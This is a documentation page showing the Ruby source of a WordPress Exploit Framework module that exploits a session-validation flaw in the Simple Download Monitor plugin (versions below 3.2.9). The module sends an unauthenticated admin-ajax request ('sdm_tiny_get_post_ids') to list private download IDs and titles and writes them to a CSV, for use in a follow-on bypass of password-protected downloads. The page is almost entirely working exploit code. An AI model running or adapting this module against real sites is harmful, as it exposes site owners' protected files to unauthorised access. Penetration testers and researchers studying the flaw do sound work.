class Wpxf::Auxiliary::SimpleDownloadMonitorFileDisclosure

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 6
def initialize
  super

  update_info(
    name: 'Simple Download Monitor File Disclosure',
    desc: %(
      This module uses a lack of session validation to get a list
      of post IDs and their titles to be used with the
      auxiliary/file_download/simple_download_monitor_file_download
      module in order to bypass the password protection on private downloads.
    ),
    author: [
      'James Golovich', # Disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['WPVDB', '8364'],
      ['URL', 'http://www.pritect.net/blog/simple-download-monitor-3-2-8-security-vulnerability']
    ],
    date: 'Jan 19 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 29
def check
  check_plugin_version_from_readme('simple-download-monitor', '3.2.9')
end
download_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 41
def download_request_params
  { 'action' => 'sdm_tiny_get_post_ids' }
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 37
def downloader_url
  wordpress_url_admin_ajax
end
file_extension() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 45
def file_extension
  '.csv'
end
parse_content_into_table_rows(content) click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 60
def parse_content_into_table_rows(content)
  table_rows = [{
    post_id: 'Post ID', title: 'Title'
  }]

  begin
    json = JSON.parse(content)
    if json['test'] != ''
      json['test'].each do |post|
        table_rows.push(post_id: post['post_id'], title: post['post_title'])
      end
    end
  rescue JSON::ParserError
    emit_error 'Could not parse the response'
    return nil
  end

  table_rows
end
register_remote_file_option?() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 33
def register_remote_file_option?
  false
end
validate_content(content) click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb, line 49
def validate_content(content)
  data = parse_content_into_table_rows(content)
  return false if data.nil?

  emit_table data

  File.open(downloaded_filename, 'w') do |file|
    data.each { |r| file.puts "#{r[:post_id]},#{r[:title]}" }
  end
end